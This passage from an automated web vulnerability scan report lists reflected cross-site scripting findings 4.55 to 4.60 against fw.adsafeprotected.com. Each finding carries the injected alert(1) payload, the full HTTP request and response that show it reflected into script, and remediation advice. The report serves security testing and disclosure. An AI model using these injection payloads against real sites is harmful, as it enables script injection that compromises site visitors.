           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGV
...[SNIP]...
opping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js"
       }
   }
}
Miwe098c61";alert(1)//bb08c81a782.prototype.getParts = function() {
return this.parts;
}
Miwe098c61";alert(1)//bb08c81a782.prototype.getPart = function(id) {
return this.parts[id];
}
window["miwe098c61";alert(1)//bb08c81a782"] = new Miwe098c61";alert(1)//bb08c81a782();


4.55. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5158"-alert(1)-"293bd78879f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dcb5158"-alert(1)-"293bd78879f/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DA8C3EB6580BDA74A6A3C507C2885868; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
yNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcb5158"-alert(1)-"293bd78879f/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47
...[SNIP]...

4.56. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d5a4"-alert(1)-"8cca82e364c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/106258d5a4"-alert(1)-"8cca82e364c/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9E55FC0BFE83E04647B4209467C8C4A9; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
CRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/106258d5a4"-alert(1)-"8cca82e364c/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAd
...[SNIP]...

4.57. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a71"-alert(1)-"18fbcbf40bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711c2a71"-alert(1)-"18fbcbf40bd/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BD959B6AEF33638B8DF2F06BF8277F0E; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
Y2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711c2a71"-alert(1)-"18fbcbf40bd/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSg
...[SNIP]...

4.58. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f192d"-alert(1)-"d55e5a7138a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adif192d"-alert(1)-"d55e5a7138a/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D0E6B1852B91D5D61A99A14AD17B596F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adif192d"-alert(1)-"d55e5a7138a/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMD
...[SNIP]...

4.59. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cacc9"-alert(1)-"5c371b0f231 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COMcacc9"-alert(1)-"5c371b0f231/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5A488FCBEAF7E64AD334958F04D83C6F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:23 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
GVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COMcacc9"-alert(1)-"5c371b0f231/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3Lmd
...[SNIP]...

4.60. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3069"-alert(1)-"bcb2ac021ed was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283d3069"-alert(1)-"bcb2ac021ed;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
